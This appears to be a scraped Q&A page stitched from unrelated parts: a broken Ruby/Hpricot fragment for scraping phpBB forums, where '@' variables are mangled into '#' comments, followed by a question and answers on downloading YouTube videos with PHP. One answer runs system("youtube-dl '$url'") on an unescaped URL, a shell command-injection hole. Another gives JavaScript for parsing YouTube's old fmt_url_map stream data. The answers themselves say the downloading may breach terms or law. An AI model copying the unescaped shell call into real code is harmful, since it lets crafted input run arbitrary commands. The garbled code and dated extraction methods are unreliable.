ua, pa = li.search('dd.lastpost/span/a') # user anchor, post anchor
q = self.parse_anchor(pa)
self.last_post f, q['p'] unless q.nil?
end
end
def last_post f,p
#last_post = {forum_id: f, post_id: p} if #last_post.nil? or p.to_i > #last_post[:post_id].to_i
end
def last_topic f,t
end
def parse_forum local, remote, start=nil
doc = Hpricot(self.read_file(local,remote))
doc.search('ul.topics/li.row').each do |li|
ta = li.search('a.topictitle').first # topic anchor
q = self.parse_anchor(ta)
f = q['f']
t = q['t']
u = self.parse_anchor(li.search('dl/dt/a').last)['u']
#topics[t] = {
forum_id: f,
topic_id: t,
user_id: u,
title: ta.inner_html
}
end
end
def parse_topic local, remote, start=nil
doc = Hpricot(self.read_file(local,remote))
if start.nil?
doc.search('div.pagination/span/a').collect{ |p| self.parse_anchor(p)['start'] }.uniq.each do |p|
self.parse_topic "#{local}.start.#{p}", "#{remote}&start=#{p}", true
end
end
doc.search('div.postbody').each do |li|
# do something
end
end
def parse_url href
r = CGI.parse URI.parse(href).query
r.each_pair { |k,v| r[k] = v.last }
end
def parse_anchor hp
self.parse_url hp.attributes['href'] unless hp.nil?
end
end
This will be a violation of Terms of Service and may be illegal too. Secondly, if StackOverflow community starts solving these kind of web-scraping problems, then you know ...
Downloading Youtube videos with PHP [closed]
Closed. This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 7 years ago. Improve this question I am searching for a way to download Youtube videos using PHP. I have searched how to do this for hours but unfortunately all the Google results I find are years old and do not work anymore. I would appreciate it if someone could explain how to do this, or give a link to an up-to-date article that explains it in detail. Thanks very much.
The first thing you should do is get a tool like Fiddler and visit a YouTube video page. In Fiddler, you will see all of the files that make up that page, including the FLV itself. Now, you know that the video isn't one of the CSS files, nor is it the image files. You can ignore those. Look for a big file. If you look at the URL, it begins with /videoplayback. Now, once you've found it, figure out how the browser knew to get that file. Do a search through the sessions (Ctrl+F) and look for "videoplayback". You will see a hit on the first page you went to, like http://www.youtube.com/watch?v=123asdf. If you dig through that file, you'll see a DIV tag with the ID of "watch-player". Within that there is a script tag to setup the flash player, and within that are all of the flash parameters. Within those is the URL to the video. So now you know how to use your tools to figure out how the browser got to it. How do you duplicate this behavior in PHP? Do a file_get_contents() on the page that references the video. Ignore everything not in that watch-player div. Parse through the code until you find that variable that contains the URL. From there you will probably have to unescape that URL. Once you have it, you can do a file_get_contents() (or some other download method, depending on what you are trying to do) to get the URL. it is that simple. Your HTML parsing code will be the most complex. Finally, keep in mind what you are about to do may be illegal. Check the EULA.
Nobody writes manuals/howtos that become outdated every four weeks. The closest you can get is inspecting the actual extraction methods in a contemporary implementation. Quite readable:
http://bitbucket.org/rg3/youtube-dl/raw/2010.08.04/youtube-dl
If you don't want to read through/reimplement it, it's obviously not simple, you could just run it as-is from PHP:
system("youtube-dl '$url'");
last time i was working on fixing one of the brocken chrome extension to download youtube video. I fixed it by altering the script part. (Javascript)
var links = new String();
var downlink = new String();
var has22 = new Boolean();
has22 = false;
var Marked=false;
var FMT_DATA = fmt_url_map;//This is html text that you have to grab. In case of extension it was readily available through:document.getElementsByTagName('script');
var StrSplitter1='%2C', StrSplitter2='%26', StrSplitter3='%3D';
if (FMT_DATA.indexOf(',')>-1) { //Found ,
StrSplitter1=',';
StrSplitter2=(FMT_DATA.indexOf('&')>-1)?'&':'\\u0026';
StrSplitter3='=';
}
var videoURL=new Array();
var FMT_DATA_PACKET=new Array();
var FMT_DATA_PACKET=FMT_DATA.split(StrSplitter1);
for (var i=0;i<FMT_DATA_PACKET.length;i++){
var FMT_DATA_FRAME=FMT_DATA_PACKET[i].split(StrSplitter2);
var FMT_DATA_DUEO=new Array();
for (var j=0;j<FMT_DATA_FRAME.length;j++){
var pair=FMT_DATA_FRAME[j].split(StrSplitter3);
if (pair.length==2) {
FMT_DATA_DUEO[pair[0]]=pair[1];
}
}
var url=(FMT_DATA_DUEO['url'])?FMT_DATA_DUEO['url']:null;
if (url==null) continue;
url=unescape(unescape(url)).replace(/\\\//g,'/').replace(/\\u0026/g,'&');
var itag=(FMT_DATA_DUEO['itag'])?FMT_DATA_DUEO['itag']:null;
var itag=(FMT_DATA_DUEO['itag'])?FMT_DATA_DUEO['itag']:null;
if (itag==null) continue;
var signature=(FMT_DATA_DUEO['sig'])?FMT_DATA_DUEO['sig']:null;
if (signature!=null) {
url=url+"&signature="+signature;
}
if (url.toLowerCase().indexOf('http')==0) { // validate URL
if (itag == '5') {
links += '<span class="yt-uix-button-menu-item" id="v240p">FLV (240p)</span>';
}
if (itag == '18') {
links += '<span class="yt-uix-button-menu-item" id="v360p">MP4 (360p)</span>';
}
if (itag == '35') {
links += '<span class="yt-uix-button-menu-item" id="v480p">FLV (480p)</span>';
}
if (itag == '22') {
links += '<span class="yt-uix-button-menu-item" id="v720p">MP4 HD (720p)</span>';
}
if (itag == '37') {
links += ' <span class="yt-uix-button-menu-item" id="v1080p">MP4 HD (1080p)</span>';
}
if (itag == '38') {
links += '<span class="yt-uix-button-menu-item" id="v4k">MP4 HD (4K)</span>';
}
FavVideo();
videoURL[itag]=url;
console.log(itag);
}
}
You can get separate video link from videoURL[itag] array.
Above logic can be converted to PHP easily
The extension can be downloaded from location http://www.figmentsol.com/chrome/ytdw/
I hope this would help someone. This is working solution (date:06-04-2013)